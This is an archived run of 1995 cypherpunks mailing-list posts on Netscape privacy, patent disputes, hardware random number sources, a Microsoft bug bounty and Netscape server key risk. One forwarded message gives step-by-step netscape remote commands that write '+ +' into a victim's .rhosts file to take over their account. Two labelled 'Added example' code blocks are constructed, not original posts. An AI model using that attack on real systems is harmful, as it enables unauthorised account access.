crays one year" comment is intended to mean anything, or if it's just
some foolish PR person who doesn't understand what he's talking about.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Mittelhauser <jonm@netscape.com>
Date: Thu, 28 Sep 95 18:39:34 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape and privacy
In-Reply-To: <9509290026.AA08282@toad.com>
Message-ID: <44fin4$rdq@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


csmyth@blaze.cs.jhu.edu (Chris Smyth) wrote:

>I personally oppose the collection of this type of behavioral tracking
>information without my explicit consent, and I would reconsider using
>software which implements the type of tracking Clark mentions above.  Note,
>Clark's reply is ambiguous because it does not indicate if the `schemes'
>have been implemented or deployed at this time.  Some list member associated
>with Netscape may wish to clarify Clark's comments.  
>
>It is true that a user automatically contacts the Netscape Web site when
>starting the browser if he or she has not reset the default home page.  I
>reset my home page long ago, but I do not know if the Netscape site is still
>contacted anyway.  Nor do I know if Netscape is contacted when I quit the
>browser, or if elapsed usage time is tracked.

The Navigator doesn't make any special connections nor perform any data collection
on the client-side.  In fact, most of the engineers here would quit long before
we would provide information without consent.  That was the reason for removing
the mail address from the HTTP header years ago...it is very easy to track what
the Navigator sends out by simply setting up a proxy/firewall...

Netscape (the company) does attempt to track users through their contacts with
our homepage...Needless to say, this is a common practice.  We track hits, IP
addresses, and attempt to use cookies to determine unique users...We sell advertising
based on estimates of hits/etc...if you never hit our site, you are never counted...
even if you do hit our site, no information (other than IP address) is ever known...

-Jon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 01:46:32 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION TO OFFER REWARD FOR HACKING MICROSOFT
Message-ID: <199509290841.BAA05624@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: Sameer Parekh 510-601-9777 (Pager: 510-321-1014)

COMMUNITY CONNEXION TO OFFER REWARD FOR HACKING MICROSOFT

Sept. 29 1995 - Community ConneXion, an Internet Privacy Provider in
Berkeley, CA, announced today that it will be providing awards to
people who find and publicize security holes in Microsoft
products.

"Microsoft claims to be promoting secure transactions on the net,"
said Sameer Parekh, founder of Community ConneXion, "We will prove
them wrong." Microsoft has been quoted making disparaging comments
about their competitor Netscape's product, Netscape Navigator.

Community ConneXion has also been offering a reward to expose holes in
Netscape's products. "We target widely used programs," said Parekh.
Parekh expects that many bugs and flaws in Microsoft's security
software will be found.

People want to use the Internet to do business. They want to be able
to buy things, manage their finances, and communicate privately from
the comfort of their home computer. Without a secure infrastructure
none of this is possible.

Information about the Hack Microsoft promotion is available from
http://www.c2.org/hackmsoft/.  People who have found security holes
and have written exploits are directed to send mail to
hackmsoft@c2.org.

Community ConneXion is the premier provider of privacy on the
Internet. They provide anonymous email accounts and support the
anonymous remailer infrastructure. Information is available from
http://www.c2.org/ or info@c2.org.

Microsoft is a trademark of Microsoft Corp. Netscape and Netscape
Navigator are trademarks of Netscape Communications Corp. This
promotion is not affiliated with Microsoft or Netscape.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Thu, 28 Sep 95 18:10:21 PDT
To: cypherpunks@toad.com
Subject: Re: Q&A on the RSA/Cylink legal dispute
In-Reply-To: <9508288123.AA812314973@snail.rsa.com>
Message-ID: <199509290110.CAA23301@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


baldwin , Robert W. Baldwin <baldwin@RSA.COM> wrote:

>Q. Why can't RSA and Cylink simply settle their differences?
>
>     A. That's a good question. The fact is that RSA recognizes this
>     litigation is not beneficial to anyone and has offered to settle the
>     dispute by granting Cylink a license to the MIT patent.

Real Answer:  Because they're all a bunch of crooks.  PKP was formed
for the purpose of monopolizing the market and screwing the customers. 
Unfortunately, RSA and Cylink were so busy trying to screw each other
that they forgot what their real mission was.

>     Cylink has consistently overestimated the strength of its legal
>     position and has refused all reasonable offers.

According to the settlement, RSA made only one offer, which Cylink
refused.  (Which was all that RSA was obligated to do.)

>     Cylink now finds itself in the unenviable position of trying
>     to sell its security products without RSA technology - which
>     is the de facto industry standard.  No amount of "spin
>     doctoring" in press releases by Cylink changes that fact.

Maybe not, but it looks like RSA has their own spin doctors working
on it as well.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 28 Sep 95 19:55:06 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape and privacy
In-Reply-To: <9509290026.AA08282@toad.com>
Message-ID: <44fn4k$s4t@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509290026.AA08282@toad.com>, csmyth@blaze.cs.jhu.edu (Chris Smyth) writes:

> It is true that a user automatically contacts the Netscape Web site when
> starting the browser if he or she has not reset the default home page.  I
> reset my home page long ago, but I do not know if the Netscape site is still
> contacted anyway.  Nor do I know if Netscape is contacted when I quit the
> browser, or if elapsed usage time is tracked.

  We are counting unique installations of netscape.  We have no way
of mapping that information to a user name.  We don't save any
information about you when you contact our web site.  The Navigator
doesn't make connections to our site behind your back.

> The future Clark posits for his corporation depends on people adopting
> Netscape software for a wide variety of tasks. He wants the browser to
> evolve toward being a general multimedia web browser, mail handler,
> newsreader, and collaboration tool.  Such a tool would handle large amounts
> of private and/or proprietary information and the creator of such a tool
> must be extremely sensitive to privacy concerns in my opinion.  Collecting
> and relaying information about usage is potentially a significant violation
> of the privacy users will expect.

  We are very sensitive to privacy concerns.  A bunch of folks now
working here revolted against an effort to track keystrokes and
mouse clicks in Mosaic while they were at NCSA.  One of those
folks was marca himself.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Fri, 29 Sep 95 01:33:10 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: SpokesPunking...
In-Reply-To: <v02120d05ac8de223a2c8@[199.0.65.105]>
Message-ID: <m0syarr-001BivC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> At 3:03 AM 9/26/95, Craig Hubley wrote:
> >"Consensus on cypherpunks seems to be that 40 bit encryption is not viable
> > for commercial applications, and that Netscape seems to have taken less
> > than due care to choose an appropriate random seed for its session keys."
> 
> No offense offered Craig, 'cause I like reading your stuff here, but the
> consensus opinion on cypherpunks is "We don' need no steeenking
> spokespunk!". 

Does this read like spokespunking ?  I kind of read it more like journalism.

Then again, the role of a temporary mouthpiece, if claimed by anyone, will
lead to a series of flame attacks no matter what they say, even if correct
and reasonable.  And we don't need more of those!  So no spokespunking!

How about standardizing on:  "It seems to me that..." and if someone wants
to refer to his impression of what 'other' punks think, then so be it.

> It seems to me that you can say that without any title, and
> the mouthier amongst us will be tapped for quotes as individuals anyway...

As I was today.  Banking technology or some such trade rag.  Stay tuned
for the editor's guaranteed-outrageous misquotes.  I was careful not to
say anything that might be construed as a quasi-official 'punk' position.
I made the point that the hacking of secure systems, when done in the open,
and without intent to grab private information, was a legitimate activity
in the computer security community, which included the cypherpunks as one
of several interested sub-communities.  And that Netscape saw it that way
too, having acknowledged that they had 'learned a lot', etc.  So...

Flame me!
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Fri, 29 Sep 95 01:36:57 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: cypherpunk press releases vs. FAQ
In-Reply-To: <199509262141.OAA24578@netcom8.netcom.com>
Message-ID: <m0syavT-001BiNC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


I favor a FAQ, but only if each individual answer is attributed to a
specific person and others can answer the same question with possibly
a contradictory answer (but may not refer to the others' answer, that
just makes it quoting and flaming).  Perhaps organized as a hypertext.
Everyone has an HTML browser now, right ?
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 28 Sep 95 21:39:53 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509290439.FAA26254@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: 25 Crays a Year to Break STT

>   Although no encryption system was totally secure, Mr Dent
>   estimated it would take "25 Cray supercomputers a year" to
>   break the STT codes.

Is it just me, or does someone need to be humbled?

STTbruter anyone?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 29 Sep 95 02:58:24 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
In-Reply-To: <9509290018.AA08111@toad.com>
Message-ID: <9509290956.AA14949@all.net>
MIME-Version: 1.0
Content-Type: text


> From:  Wes Thomas <wes@ora.com>
> 
> The press recently reported that the National Science Foundation has turned
> over Internet Domain Name registration to Network Solutions, Inc. (NSI) of
> Herndon, VA. The press failed to note some interesting connections.
> 
> Tomorrow morning (Sept. 26), Web Review, a biweekly online magazine (see
> Special Report at http://gnn.com/wr/) will reveal that NSI was purchased in
> May by Scientific Applications International Corporation (SAIC) of San

That's Science Applications ...  An employee owned systems integrator. 
They are one of the largest systems integrators in the world, 2nd largest
to the US government (last time I looked).

> Diego. SAIC is a $2 billion company indicted by the Justice Department on
> ten felony counts for fraud in managing a Superfund toxic cleanup site (SAIC
> pleaded guilty) and sued by the Justice Department for civil fraud on an
> F-15 fighter contract.

Interesting summary, but you forgot to note that what really happened
was that SAIC made some bookkeeping errors, noticed them in a
self-audit, and reported themselves to the government.  Unlike some
companies that try to cover these things up, SAIC found the problems
themselves and didn't cover them up.

> SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
> director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
> General Max Thurman, commander of the Panama Invasion. Recently departed
> board members include Robert Gates, former CIA director; William Perry,
> current Secretary of Defense; and John Deutch, the current CIA director.
> Current SAIC government contracts include re-engineering information systems
> at the Pentagon, automation of the FBI's computerized fingerprint
> identification system, and building a national criminal history information
> system.

SAIC is also one of the largest companies in the information security
field, with over 500 active info-sec contracts at any given time.  They
work for industry as well as government in info-sec, systems
integration, and outsourcing.  For example, they currently do all of the
IT work for BP, handle info-sec for several banks and wall street firms,
have contracts with some of the large players in the entertainment business,
and sponsored the last Americas cup entry from the US.

> "At the very time the Internet community is struggling with the issues of
> encryption and privacy, I'm more than a little uneasy to find this bunch of
> ex-spooks sitting at the very entry point of the Net," says Jim Warren (a
> leading activist in making government records accessible) in the article,
> which was written by investigative journalist Stephen Pizzo, Web Review
> Senior Editor and co-author of the book Inside Job, an expose on the savings
> & loan looting.

The real ex-spooks aren't that heavily embedded in SAIC.  The company
was started by a well known physicist who is still the CEO and chairman,
and they do a lot of research in preserving the environment, undersea
research, business reengineering, and other things that are not spookish.

Just thought I would present the rest of the story.

By the way, I have been a consultant for them from time to time, and I
have found them to be hard working, intelligent, and highly motivated. 
They do indeed have a lot of very intelligent people working for them,
many of whom used to work in high-level positions for both democratic
and republican administrations, but I don't think you should hold that
against them - after all, if you were a major government contractor,
wouldn't you want to get people who know how the government works?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nefud@io.com (Allan Bailey)
Date: Fri, 29 Sep 95 05:57:13 PDT
To: cypherpunks@toad.com
Subject: screensavers and idle computation.
Message-ID: <199509291252.HAA13292@tristero.io.com>
MIME-Version: 1.0
Content-Type: text/plain



  To the folx working on the RC4 et al. distributed keysearch Net:

Add a module that will be run from things like "xscreensaver".  As Tim May
pointed out, current use of crypto is a "tiny fraction of
the total computons consumed running screen savers".  So let's use them, eh?

Besides, it'd be kind of neat seeing the "galaxies in hyperspace" displayed
in a fractal-like screensaver image.

--
Allan Bailey                              | "Freedom is not free."  _O_
Senlima Diverseco je Senlimaj Kombinajxoj.| nefud@io.com             |
KC5KSF                                    |
GCS w+ v-/+ C++++ U@$ P+++ L++ E++ N++ po--- Y++ b++
============================================================
= When Privacy Is Outlawed, Only Outlaws Will Have Privacy =
= I Support the Phil Zimmermann Legal Defense Fund!        =
= email: zldf@clark.net   http://www.netresponse.com/zldf  =
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Fri, 29 Sep 95 06:27:18 PDT
To: cypherpunks@toad.com
Subject: FinCen Blurb in local paper
Message-ID: <306bf42f13dd002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Found this in the St Paul Pioneer Press yesterday, no wire service
attribution.

Cyber banking risks cited

New York
Smart Cards, on-line banking and other high-tech consumer 
payment services could be exploited by money launderers 
and other crooks, a Treasury Department official warned
Wednesday. Stanley Morris, director of the Financial Crimes
Enforcement Network, said that government and regulatory
agencies believe the new systems, known as cyber banking,
will profoundly alter financial services in the future.

"The government has got to get its act together" and quickly
decide on whether on-line banking systems and smart cards 
require new regulations," Morris said.

Morris spoke to reporters after a day-long closed-door meeting
of bankers, regulators, law enforcement officials and technology
executives sponsored by FinCen, the government's anti-money
laundering agency.

--- end article ---


-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 29 Sep 95 05:28:46 PDT
To: baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: Q&A on the RSA/Cylink legal dispute
In-Reply-To: <9508288123.AA812314973@snail.rsa.com>
Message-ID: <9509291227.AA03616@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


IANAL, but after a couple of hours of slogging through the arbitration
report, here's my layman's interpretation:

-	Either both sides or neither side breached the agreement forming PKP
	(the arbitrators went out of their way to avoid assigning blame)

-	PKP is dissolved by mutual agreement.

-	Cylink maintains control of the Stanford patents (Hellman-Merkle,
	Diffie-Hellman [others (?)])

-	RSA maintains control of the MIT patents (RSA [others])

-	It isn't clear to me whether Cylink maintained the right to use
	the RSA software in creating a product.  The arbitration order
	was as clear as mud on this point.  It is clearer that they
	maintained the right to *use the patented technology* covered by
	the MIT patents in the creation of a product.  In either case,
	it appears that their right does not extend to the point where
	they can sublicense the technology -- so it looks to me like
	Cylink can't sell you an RSA toolkit, for instance.

-	RSA has no rights to license the Stanford patents.


RSA's FAQ (via baldwin@rsa.com) writes:

>      A. The Panel's ruling was very specific. Everything it said about third 
>      parties, including RSA customers who use software, refers to their need 
>      for patent licenses. If you bought software from RSA and RSA itself had 
>      the rights to make that software and license it to you, you don't need 
>      a separate patent license; rights to the patents came with the product. 
>      The Ruling also states, "RSA has a right to license its software."

This answer is evasive.  RSA didn't give the complete sentence from the
arbitration panel's order.  It is:

    "Therefore, after April 6, 1990, RSA has a right to license its
    (RSA's) software to third-parties but does not have the right to
    license such third-parties under the Stanford patents."

So, their answer appears to be correct only if the RSA software doesn't
infringe the Stanford patents.  And that seems to be a matter of opinion.
Furthermore, the next sentence in the order continues:

    "To the extent RSA provides code to third-parties which causes an 
    infringement of a valid and enforceable claim of the Stanford patents,
    assuming the third party is not separately licensed under the Stanford
    patent [sic], nothing in this order shall prevent Cylink from pursuing
    its rights under the Stanford patents against such third party."


That's pretty clear to me folks, but make your own judgements.


>                                                                         If 
>      you're using RSA's software -you didn't write your own- you don't need 
>      a separate patent license under either the MIT or Stanford patents.

Again, only to the extent that you're not infringing the Stanford patents.


So, pay your nickel, take your chances.  Does RSA's software infringe
the Stanford patents?

(Of course these are my opinions, not my company's)


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 29 Sep 95 06:35:40 PDT
To: cypherpunks@toad.com
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <199509282349.TAA00187@hoopsnake.cjs.net>
Message-ID: <doug-9508291335.AA00652565@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>> One initial connection is all that is needed to have a secure
>> connection for the lifetime of the two communicating parties. This
>> initial connection can be accomplished via any number of ways. It
>> does involve an initial one time only shared secret. This is much
>> different than the many shared secrets and key management issues of
>> private and public key systems.  For the initial connection you can
>> stick the machines back to back if you are really worried about
>> security. This initial transaction serves as a seed for subsequent
>> transactions. All subsequent transactions depend on preceding
>> transactions. A degree of randomness comes from the randomness of
>> the messages. Each next word in the message is random.
>
>I'm a little new to this, but I thought the whole idea behind keys was
>not having to whisper "secrets" to someone on the other side of a
>crowded mall. Most people don't have the luxury of connecting their
>computers back to back with someone on the other side of the world
>just to ensure a secure communications path. There would have to be
>some mechanisms to ensure that secure delivery of your "secret", and
>that brings us back to key management, so the whole thing is rather
>self defeating.
>
>Christopher
>
>
>

Remember, that's only one of the options for the truly paranoid. If you want,
you can just use their (for now secret) keying implementation on the floppy
disk for the first exchange.
 I feel a little uncomfortable with this at the moment (as I'm sure do most
of the other readers). The algorithm, once revealed should be a very interesting
read.
 However, this does not bring us back to key management in the sense of
traditional public or private cryptosystems. Since the entire communication
hinges on the first successful exchange, this is the exchange where the
key is most critical. I believe they have an option for entering a secret
key (initialization vector it seems) as well. So, presumably you could call
somebody on the phone, or send them a PGP message, or whatever, to exchange
this initial key. 
 It still seems to me that once this initial communication is out of the way,
that the product will work fairly well. I see it as an excellent way, in
our situation, to provide remote professors and students secure communication
paths to our network in the future (hinging on the development of some kind
of telnet client).  I rather think that the whole public/private key
thing is self-defeating... computers get more powerful, key gets hacked...
key size increases.. etc.. etc.. This sounds like a novel alternative. People
interested in non-disclosure analysis may wish to contact the company.

Elementrix: 212-888-8879, 850 Third Avenue NY, NY 10022 (North America
office)

I'm not sure what, if any, real cryptanalysis has been done on this. David
Kahn himself admitted he wasn't an expert cryptanalyst. I don't know if anybody
has done any in depth review or subjected it to differential cryptanalysis
of any kind.

 It seems to be a OTP/stream cipher of some kind.. subsequent number depending
on previous numbers. I don't know if it's possible to prove that the sequence
will never repeat, having not seen the algorithm. But if it did not, it would
seem to be strong enough. Too many questions, too few answers.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
	Apple T-shirt on Win95 - "Been there, done that"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Sep 95 08:39:00 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
Message-ID: <ac9161a3050210040cbd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:14 PM 9/28/95, cjs wrote:
>Hello all.
>
>Someone mentioned this on IRC last night, and it sounded like a really
>cool idea, so I thought I'd mention it.
>
>The idea is to generate random numbers using a geiger counter tube and
>a small portion of radioactive substance (like perhaps the stuff they
>use in smoke detectors?) Would that be random enough?
>
>I thought it was a neat idea anyway.


It's a well-known idea. My FAQ has a section on this, and the Cypherpunks
archives have many mentions of this.

For the newcomers, here are some of the issues, very briefly presented:

1. Incorporating a "Geiger counter tube" is nontrivial. A solid-state
detector does the same thing, and is a better approach.

2. Incorporating Am-241 or other alpha emitters in microcurie levels would
require licensing, regulatory oversight, etc., etc. Don't count on it.

3. Data rates are fairly low. Anything that "clicks" at high rates (> 1K
counts per second) would be too radioactive to ship.

4. Zener diodes and other random noise sources are cheaper to build, more
consistent in output, and easier to integrate into actual products.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
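
Added example (not part of Tim May's post or his FAQ): a sketch of point 3, showing how the pulse rate caps the output bit rate. The extraction method (comparing successive inter-pulse intervals), the 1 microsecond timer tick and the simulated Poisson pulse train are assumptions made for illustration.

```python
import random

TICK_S = 1e-6  # assumed timer resolution of the pulse counter


def simulate_pulse_ticks(rate_cps, n_pulses, seed=1995):
    """Constructed input: timestamps (in timer ticks) of a Poisson pulse train.

    A software PRNG stands in for the detector so the example runs offline;
    a real device would supply these timestamps from hardware.
    """
    rng = random.Random(seed)
    t = 0.0
    ticks = []
    for _ in range(n_pulses):
        t += rng.expovariate(rate_cps)  # exponential gaps between decays
        ticks.append(int(t / TICK_S))
    return ticks


def bits_from_intervals(ticks):
    """One bit per non-overlapping pair of intervals: 1 if the first is longer.

    Pairs never share an interval, so the bits stay independent. Ties (equal
    tick counts) are discarded instead of being forced to 0 or 1, which would
    bias the output.
    """
    gaps = [b - a for a, b in zip(ticks, ticks[1:])]
    bits = []
    for i in range(0, len(gaps) - 1, 2):
        first, second = gaps[i], gaps[i + 1]
        if first != second:
            bits.append(1 if first > second else 0)
    return bits


def measure(rate_cps, n_pulses=20000):
    """Return (output bits per second, fraction of one-bits) for a source."""
    ticks = simulate_pulse_ticks(rate_cps, n_pulses)
    bits = bits_from_intervals(ticks)
    duration_s = (ticks[-1] - ticks[0]) * TICK_S
    return len(bits) / duration_s, sum(bits) / len(bits)


def seconds_to_collect(n_bits, rate_cps):
    """Time the source needs to deliver n_bits of extracted output."""
    bits_per_second, _ = measure(rate_cps)
    return n_bits / bits_per_second


if __name__ == "__main__":
    for rate in (10, 100, 1000):  # counts per second
        bps, ones = measure(rate)
        print(f"{rate:5d} cps -> {bps:7.1f} bit/s, ones={ones:.3f}, "
              f"1024 bits in {seconds_to_collect(1024, rate):.1f} s")
```

Each output bit costs two pulses, so even the 1K counts per second ceiling mentioned in point 3 yields only about 500 bits per second with this extractor.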






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: millar@pobox.upenn.edu (Dave Millar)
Date: Fri, 29 Sep 95 06:29:07 PDT
To: cypherpunks@toad.com
Subject: Assessing Netscape Commerce Server Risk
Message-ID: <199509291328.JAA08472@pobox.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Would anyone care to critique this assessment?

>Q:  What is the risk of implementing the Commerce Server without waiting for
>the Oct. 9 patch (which fixes the randomness problem with the server's
>public/private key pair)?

>A: The exposure is essentially this: if someone were to make a concerted
>attack on your public/private key pair, they might be able to discover your
>private key.  Combined with net eavesdropping this would allow interception
>and decrypting of SSL-encrypted traffic to your Commerce Server, and
>combined with IP address and DNS domain impersonation would allow someone
>to masquerade as your server.
>
>I would characterize this risk as low to moderate, with the higher risk
>only applying if your Commerce Server is handling larger financial
>transactions or extremely sensitive information.
>
>The time required for an attack on your key pair depends on how close the
>attacker can come to guessing exactly when your key pair was generated, and
>what the pid/ppid were for the key generation program at the time the key
>was generated, as well as how fast the attacker can generate candidate key
>pairs.  Since the time and pid/ppid are probably guessable only within
>broad limits (e.g., within a few days for the time), and generating key
>pairs takes on the order of a second or so, the estimated attack times are
>much longer than the attack times for SSL messages.  I believe Netscape has
>published estimates like 60 days or so to crack a key pair; even if those
>estimates are too high by factors of two or three the times are still
>comparable to the time until the patch is available.
>
>So if you're really concerned you can certainly eliminate the risk by
>shutting down SSL-secure services until you get the patch; however I'd
>weigh that against the downside of not having those services accessible.
>
>P.S. If you do continue running your Commerce Server with SSL, one simple
>thing that might help thwart attacks is to do a "touch" on your server key
>file and server certificate file (or copy them somewhere and then copy them
>back) to update the date/time modified on the files.  This eliminates one
>possible clue as to when the key pair was generated.

_________________________________________________
Dave Millar  University Information Security Officer
3401 Walnut St., Suite 265C
Philadelphia, PA 19104-6228
University of Pennsylvania
For security matters:  security@isc.upenn.edu (read by Data Admin. staff)

Other matters: millar@pobox.upenn.edu
voice: (215) 898-2172
fax: (215) 898-1729
For PGP 2.6 Public key: http://www.upenn.edu/security-privacy/
PGP Fingerprint:   28 FB 09 DC C7 96 C2 53  1A B8 BE 3B 73 32 46 4C   
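
Added example (not from the quoted assessment and not from Netscape): the work-factor reasoning in the answer above, written as a small model. The clock granularity, the pid/ppid ranges and both scenarios are constructed assumptions; only the "few days" window and the roughly one second per key pair come from the message.

```python
import math
from dataclasses import dataclass

SECONDS_PER_DAY = 86400


@dataclass
class SeedGuess:
    """What an outsider must guess to reproduce the key-generation inputs."""
    time_window_s: float        # uncertainty about when the key was generated
    clock_granularity_s: float  # assumed resolution of the time value used
    pid_candidates: int         # plausible values for the pid (assumption)
    ppid_candidates: int        # plausible values for the ppid (assumption)
    keygen_s: float = 1.0       # message: a key pair takes "a second or so"

    def candidates(self):
        time_slots = math.ceil(self.time_window_s / self.clock_granularity_s)
        return time_slots * self.pid_candidates * self.ppid_candidates

    def bits(self):
        """Effective entropy of the guess, in bits."""
        return math.log2(self.candidates())

    def expected_days(self, machines=1):
        # On average the right inputs are found halfway through the search.
        work_s = self.candidates() / 2 * self.keygen_s
        return work_s / machines / SECONDS_PER_DAY

    def machines_to_finish_within(self, days):
        """Parallel machines needed for the expected search to fit in `days`."""
        return math.ceil(self.expected_days() / days)


def scenarios():
    """Two constructed cases that differ only in how well the time is known."""
    return {
        # Key file mtime left untouched: generation time known to ~2 seconds.
        "mtime_visible": SeedGuess(2, 1.0, 1000, 100),
        # mtime reset (the P.S. above): time known only to within three days.
        "mtime_hidden": SeedGuess(3 * SECONDS_PER_DAY, 1.0, 1000, 100),
    }


if __name__ == "__main__":
    days_until_patch = 10  # constructed: about Sept. 29 to the Oct. 9 patch
    for name, guess in scenarios().items():
        print(f"{name:14s} {guess.bits():5.1f} bits, "
              f"{guess.expected_days():10.1f} days on one machine, "
              f"{guess.machines_to_finish_within(days_until_patch)} machines "
              f"to finish before the patch")
```

Under these assumptions the time window dominates the estimate, which is why hiding the file modification time changes the result by several orders of magnitude.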






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 09:40:25 PDT
To: perry@piermont.com
Subject: Re: Hack Microsoft
In-Reply-To: <199509281510.LAA21039@frankenstein.piermont.com>
Message-ID: <199509291635.JAA06820@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	As of 9:34AM on the day of the release hackmsoft has so far
received -two- microsoft bugs and exploits.

> 
> 
> John Young writes:
> >    9-28-95. W$Japer:
> > 
> >       Regarding Netscape, Mr. Dent of Microsoft said the
> >       firm's security deficiencies that have recently come to
> >       light have "tainted" electronic commerce on the
> >       Internet.
> 
> That's almost an invitation to hack Microsoft's web products, isn't it?
> 
> (Anyone from Netscape care to join in the fun?)
> 
> Perry
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 09:55:35 PDT
To: jk@digit.ee (Jyri Kaljundi)
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <199509291644.JAA07516@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	That's called an X hole, not a netscape hole.

> 
> 
> Haven't seen this on the cypherpunks yet, sorry if this has been here
> already.
> 
> Juri
> 
> <o       Jüri Kaljundi            e-mail: jk@digit.ee         o<
>  >o                             tel: +372 6308994            o>
> <o       DigiTurg               http://www.digit.ee/        o<
> 
> ---------- Forwarded message ----------
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.
> 
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps :
> 
> - make a text file containing only "+ +" accessible (as file, as URL, or
>   whatever you like) to the target Netscape client. This is quite easy, either
>   if you have a personal WWW page (http://... URL) or an account on the
>   target machine (file://... URL), or even by uploading it to an anon FTP
> 
> - set your DISPLAY environment variable to the target display
> 
> - run the following set of commands :
> 
>   netscape -noraise -remote "openURL(<put-your-URL-here>)"
>   netscape -noraise -remote "saveAs(.rhosts)"
>   netscape -noraise -remote back
> 
> In the second command, the path should be specified whenever possible
> (~ is not accepted).
> 
> If the target user does not already have a .rhosts and is not looking at that
> precise moment, then the chances are it worked !
> 
> Solution to the problem : every user concerned should either create a
> Xauthority file, or stop using Netscape.
> 
> 	MXK
> 
> 
> PS: WHY do they bother with PGP and RSA security when they keep such holes ????
> 
> +------------------------------------+---------------------------------+
> |  Denis AUROUX  (MXK)               | Ecole Normale Superieure        |
> |  255 rue Saint-Jacques             | 45 rue d'Ulm                    |
> |  75005 PARIS FRANCE                | 75005 PARIS                     |
> |  email: auroux@clipper.ens.fr      | FRANCE                          |
